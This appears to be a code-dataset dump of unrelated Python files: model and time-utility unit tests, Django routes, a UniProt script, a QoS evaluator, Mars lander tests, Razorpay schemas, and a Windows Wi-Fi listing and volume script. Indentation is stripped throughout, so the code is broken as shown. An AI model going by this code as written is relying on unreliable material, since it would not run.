l2_weight = torch.tensor([[-0.2, 0.4], [-1, 1.3]])
self.toy_dan_model.linear2.weight.data.copy_(l2_weight)
nn.init.ones_(self.toy_dan_model.linear1.bias.data)
nn.init.zeros_(self.toy_dan_model.linear2.bias.data)
def test_forward_logits(self):
logits = self.toy_dan_model(text1['text'], text1['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2130, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.1724999, places=2)
logits = self.toy_dan_model(text2['text'], text2['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2324001, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2002001, places=2)
def test_average(self):
d1 = [[1, 1, 1, 1]] * 3
d2 = [[2, 2, 2, 2]] * 2
d2.append([0, 0, 0, 0])
docs = torch.tensor([d1, d2])
lengths = torch.tensor([3, 2])
average = self.wide_dan_model.average(docs, lengths)
for ii in range(4):
self.assertAlmostEqual(average[0][ii], 1.0)
self.assertAlmostEqual(average[1][ii], 2.0)
def test_minibatch_logits(self):
logits = self.toy_dan_model(text3['text'], text3['len'])
print(logits)
self.assertAlmostEqual(logits[0][0].item(), 0.2360, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2070, places=2)
self.assertAlmostEqual(logits[1][0].item(), 0.1910, places=2)
self.assertAlmostEqual(logits[1][1].item(), 0.1219999, places=2)
logits = self.toy_dan_model(text4['text'], text4['len'])
self.assertAlmostEqual(logits[0][0].item(), 0.2820, places=2)
self.assertAlmostEqual(logits[0][1].item(), 0.2760, places=2)
self.assertAlmostEqual(logits[1][0].item(), 0.2104, places=2)
self.assertAlmostEqual(logits[1][1].item(), 0.1658, places=2)
self.assertAlmostEqual(logits[2][0].item(), 0.2213333, places=2)
self.assertAlmostEqual(logits[2][1].item(), 0.1733332, places=2)
def test_vectorize(self):
word2ind = {'text': 0, '<unk>': 1, 'test': 2, 'is': 3, 'fun': 4, 'check': 5, 'vector': 6, 'correct': 7}
lb = 1
text1 = ['text', 'test', 'is', 'fun']
ex1 = text1
vec_text = QuestionDataset.vectorize(ex1, word2ind)
self.assertEqual(vec_text[0], 0)
self.assertEqual(vec_text[1], 2)
self.assertEqual(vec_text[2], 3)
self.assertEqual(vec_text[3], 4)
text2 = ['check', 'vector', 'correct', 'hahaha']
ex2 = text2
vec_text = QuestionDataset.vectorize(ex2, word2ind)
self.assertEqual(vec_text[0], 5)
self.assertEqual(vec_text[1], 6)
self.assertEqual(vec_text[2], 7)
self.assertEqual(vec_text[3], 1)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1614806 | from django.urls import path
from. import views
urlpatterns = [
path('',views.index,name='index'),
path('index',views.index,name='index'),
path('about',views.about,name='about'),
path('buses',views.buses,name='buses'),
path('Route',views.Route,name='Route')
]
| StarcoderdataPython |
4817819 | <gh_stars>10-100
import unittest
from datetime import datetime, timezone
from pyspedas.utilities.time_string import time_string, time_datetime, time_string_one
from pyspedas.utilities.time_double import time_float_one, time_float, time_double
class TimeTestCases(unittest.TestCase):
def test_time_datetime(self):
"""Test time_datetime function."""
self.assertTrue(time_datetime(1450137600.0000000) == datetime(2015, 12, 15, 0, 0, tzinfo=timezone.utc))
self.assertTrue([time_datetime(1450137600.0000000), time_datetime(1444953600.0000000)]
== [datetime(2015, 12, 15, 0, 0, tzinfo=timezone.utc), datetime(2015, 10, 16, 0, 0, tzinfo=timezone.utc)])
def test_time_string(self):
"""Test time_string function."""
self.assertTrue(time_string(fmt='%Y-%m-%d') == datetime.now().strftime('%Y-%m-%d'))
self.assertTrue(time_string(1450181243.767, fmt='%Y-%m-%d') == '2015-12-15')
self.assertTrue(time_string(1450181243.767, fmt='%Y-%m-%d/%H:%M:%S') == '2015-12-15/12:07:23')
self.assertTrue(time_string(1450181243.767) == '2015-12-15 12:07:23.767000')
self.assertTrue(time_string([1450181243.767, 1450181263.767]) == ['2015-12-15 12:07:23.767000', '2015-12-15 12:07:43.767000'])
def test_time_double(self):
"""Test time_double function."""
self.assertTrue(time_string(time_double(), fmt='%Y-%m-%d') == datetime.now().strftime('%Y-%m-%d'))
self.assertTrue(time_double('2015-12-15/12:00') == 1450180800.0000000)
self.assertTrue(time_double('2015-12-15/12') == 1450180800.0000000)
#self.assertTrue(time_double('2015-12-15/6') == 1450159200.0000000) #this one doesn't work
self.assertTrue(time_double('2015-12-15/6:00') == 1450159200.0000000)
self.assertTrue(time_double('2015-12-15/06:00') == 1450159200.0000000)
self.assertTrue(time_double('2015-12-15') == 1450137600.0000000)
self.assertTrue(time_double('2015 12 15') == 1450137600.0000000)
self.assertTrue(time_double('2015-12') == 1448928000.0000000)
self.assertTrue(time_double('2015') == 1420070400.0000000)
self.assertTrue(time_double('2015-12-15 12:07:23.767000') == 1450181243.767)
self.assertTrue(time_double(['2015-12-15 12:07:23.767000', '2015-12-15 12:07:43.767000']) == [1450181243.767, 1450181263.767])
if __name__ == '__main__':
unittest.main() | StarcoderdataPython |
3232718 | """
"""
__author__ = '<NAME> (DRL)'
# region the regular Type-Hints stuff
try:
# support type hints in Python 3:
# noinspection PyUnresolvedReferences
import typing as _t
except ImportError:
pass
# endregion
| StarcoderdataPython |
114447 | <filename>code/lychrel_numbers/sol_55.py
# -*- coding: utf-8 -*-
'''
File name: code\lychrel_numbers\sol_55.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #55 :: Lychrel numbers
#
# For more information see:
# https://projecteuler.net/problem=55
# Problem Statement
'''
If we take 47, reverse and add, 47 + 74 = 121, which is palindromic.
Not all numbers produce palindromes so quickly. For example,
349 + 943 = 1292,
1292 + 2921 = 4213
4213 + 3124 = 7337
That is, 349 took three iterations to arrive at a palindrome.
Although no one has proved it yet, it is thought that some numbers, like 196, never produce a palindrome. A number that never forms a palindrome through the reverse and add process is called a Lychrel number. Due to the theoretical nature of these numbers, and for the purpose of this problem, we shall assume that a number is Lychrel until proven otherwise. In addition you are given that for every number below ten-thousand, it will either (i) become a palindrome in less than fifty iterations, or, (ii) no one, with all the computing power that exists, has managed so far to map it to a palindrome. In fact, 10677 is the first number to be shown to require over fifty iterations before producing a palindrome: 4668731596684224866951378664 (53 iterations, 28-digits).
Surprisingly, there are palindromic numbers that are themselves Lychrel numbers; the first example is 4994.
How many Lychrel numbers are there below ten-thousand?
NOTE: Wording was modified slightly on 24 April 2007 to emphasise the theoretical nature of Lychrel numbers.
'''
# Solution
# Solution Approach
'''
'''
| StarcoderdataPython |
16943 | #!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose): #put this in class
if len(words)==1: #does not capture UniProt peptide case
if verbose:
print 'No chain found: {0}. Structure is discarded'.format(words)
length = ''
elif '>' in words[i+1]:
length = ''
elif '?' in words[i+1]:
length = ''
elif '?' in words[i] or '<' in words[i]:
if verbose:
print 'No starting residue for chain: {0}'.format(words)
length = int(words[i+1])
else:
length = int(words[i+1]) - int(words[i]) + 1
return length
class UniProtLength():
def __init__(self, verbose, d_ref):
self.verbose = verbose
self.d_ref = d_ref
uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
if organism=='new_protherm':
print len(d_ref)
self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
else:
self.labels, self.raw_data = uniprotapi.organism_info()
self.d_output = {}
def run(self):
for line in self.raw_data:
words = line.split()
uniprot = words[self.labels.index('Entry')]
if uniprot in self.d_ref:
chain_length_i = self.labels.index('Chain')+1
chain_length = parse_chain_length(words, chain_length_i, self.verbose)
if chain_length:
self.d_output[uniprot] = chain_length
return self.d_output
if __name__ == "__main__":
args = help_message(help_msg, bool_add_verbose = True)
d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
uniprot_length = UniProtLength(args.verbose, d_ref)
d_output = uniprot_length.run()
if organism!='protherm':
d_output = {d_ref[uniprot]: res for uniprot, res in d_output.iteritems()}
xlabel = 'oln'
else: #not supported for ProTherm
xlabel = 'uniprot'
writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| StarcoderdataPython |
1708651 | <reponame>ENCODERS09/AMF
########################################################
# evaluator.py
# Author: <NAME> <<EMAIL>>
# Created: 2014/2/6
# Last updated: 2016/4/30
########################################################
import numpy as np
import time
from utils import logger
import evallib
import AMF
from scipy import stats, special
import multiprocessing
#======================================================#
# Function to evalute the approach at all settings
#======================================================#
def execute(tensor, para):
# loop over each density and each round
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for den in para['density']:
for roundId in xrange(para['rounds']):
pool.apply_async(executeOneSetting, (tensor, den, roundId, para))
pool.close()
pool.join()
else: # run on single processes
for den in para['density']:
for roundId in xrange(para['rounds']):
executeOneSetting(tensor, den, roundId, para)
# summarize the dumped results
evallib.summarizeResult(para, tensor.shape[2])
#======================================================#
# Function to run the prediction approach at one setting
#======================================================#
def executeOneSetting(tensor, density, roundId, para):
logger.info('density=%.2f, %2d-round starts.'%(density, roundId + 1))
(numUser, numService, numTime) = tensor.shape
dim = para['dimension']
# initialization
U = np.random.rand(numUser, dim)
S = np.random.rand(numService, dim)
p = np.zeros(numUser)
q = np.zeros(numService)
# run for each time slice
for sliceId in xrange(numTime):
# boxcox data transformation
matrix = tensor[:, :, sliceId]
dataVector = matrix[:]
(transfVector, alpha) = stats.boxcox(dataVector[dataVector > 0])
maxV = np.max(transfVector)
minV = np.min(transfVector)
transfMatrix = matrix.copy()
transfMatrix[transfMatrix != -1] = stats.boxcox(transfMatrix[transfMatrix != -1], alpha)
transfMatrix[transfMatrix != -1] = (transfMatrix[transfMatrix != -1] - minV) / (maxV - minV)
# remove data entries to generate trainMatrix and testMatrix
seedID = roundId + sliceId * 100
(trainMatrix, testMatrix) = evallib.removeEntries(matrix, density, seedID)
trainMatrix = np.where(trainMatrix > 0, transfMatrix, 0)
(testVecX, testVecY) = np.where(testMatrix)
testVec = matrix[testVecX, testVecY]
# invocation to the prediction function
startTime = time.clock()
predictedMatrix = AMF.predict(trainMatrix, U, S, p, q, para)
runningTime = float(time.clock() - startTime)
# evaluate the estimation error
predVec = predictedMatrix[testVecX, testVecY]
predVec = (maxV - minV) * predVec + minV
predVec = evallib.argBoxcox(predVec, alpha)
evalResult = evallib.errMetric(testVec, predVec, para['metrics'])
result = (evalResult, runningTime)
# dump the result at each density
outFile = '%s%s_%s_result_%02d_%.2f_round%02d.tmp'%(para['outPath'],
para['dataName'], para['dataType'], sliceId + 1, density, roundId + 1)
evallib.dumpresult(outFile, result)
logger.info('sliceId=%02d done.'%(sliceId + 1))
logger.info('density=%.2f, %2d-round done.'%(density, roundId + 1))
logger.info('----------------------------------------------')
| StarcoderdataPython |
1762728 | import unittest
import numpy as np
from lander.environment import MarsLanderEnv
class MarsLanderEnvTest(unittest.TestCase):
def test_detection_landing_area(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
# Test detection of landing area
env = MarsLanderEnv(ground=ground)
assert env.landing_area == [6, 11]
def test_correct_physic(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
init_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
env = MarsLanderEnv(init_state)
for i in range(3):
state = env.update_state(-15, 1)
for i in range(4):
state = env.update_state(-15, 0)
state = env.update_state(-5, 0)
for i in range(60):
state = env.update_state(0, 0)
np.testing.assert_array_equal(np.rint(state), [1191, 405, -44, -66, 399, -20, 3])
def test_collision(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
initial_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
env = MarsLanderEnv(initial_state, ground)
for i in range(70):
state, reward, done, info = env.step([-1, 1])
if done:
break
self.assertEqual(i, 39)
self.assertLess(reward, 0)
def test_rover_exits_field_of_view(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
initial_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
env = MarsLanderEnv(initial_state, ground)
for i in range(6):
state, reward, done, info = env.step([-1, 1])
for i in range(64):
state, reward, done, info = env.step([0, 0])
if done:
break
self.assertEqual(i, 54)
self.assertLess(reward, 0)
def test_successful_landing(self):
# https://www.codingame.com/ide/puzzle/mars-lander-episode-1 - Straight landing
initial_state = tuple(dict(x=2500, y=2500, vx=0, vy=0, fuel=500, angle=0, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[5000, 1500],
[6999, 1000],
]
)
env = MarsLanderEnv(rover=initial_state, ground=ground)
# Boost speed to max
env.step([0, 1])
env.step([0, 1])
env.step([0, 1])
env.step([0, 1])
for i in range(70):
state, reward, done, info = env.step([0, -1])
if done:
break
state, reward, done, info = env.step([0, 1])
self.assertEqual(i, 64)
self.assertGreater(reward, 0)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1782451 | <reponame>sakthiRathinam/fastapicorenew
from uuid import UUID
from pydantic import BaseModel
from typing import List, Optional
from .models import RazorPayPlans
class RazorData(BaseModel):
razorpay_order_id:str
razorpay_payment_id: str
razorpay_signature: str
error: Optional[bool] = False
class CreateMonthlyPlan(BaseModel):
amount: int
title: str
discount_percent: Optional[int] = 0
number_of_months: Optional[int] = 1
class CreateRazorPayment(BaseModel):
clinic_id: int
user_id:int
selected_plan:int
| StarcoderdataPython |
3363487 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/4/14 上午 10:26
# @File : run.py
# @Software: PyCharm
# @Author : LiTian
import subprocess
import ctypes
# 模拟按下降低音量按键
def set_speaker_vol(num):
WM_APPCOMMAND = 0x319
APPCOMMAND_VOLUME_UP = 0x0a
APPCOMMAND_VOLUME_DOWN = 0x09
APPCOMMAND_VOLUME_MUTE = 0x08
hwnd = ctypes.windll.user32.GetForegroundWindow()
ctypes.windll.winmm.waveOutSetVolume(hwnd, 0xffffffff)
for i in range(num):
ctypes.windll.user32.PostMessageA(hwnd, WM_APPCOMMAND, 0, APPCOMMAND_VOLUME_DOWN * 0x10000)
# 使用window命令netsh wlan show network,获取搜索到的wifi列表
def get_wifi_list():
result = subprocess.check_output(['netsh', 'wlan', 'show', 'network'])
result = result.decode('gbk')
lst = result.split('\r\n')
# 处理列表文本获取wifi名队列
wifi_name = []
for s in lst:
if 'SSID' in s:
wifi_name.append(s.split(':')[1].strip())
return wifi_name
if __name__ == '__main__':
wifi_name = 'Midea'
wifi_name_list = get_wifi_list()
if wifi_name in wifi_name_list:
print(wifi_name)
set_speaker_vol(50)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.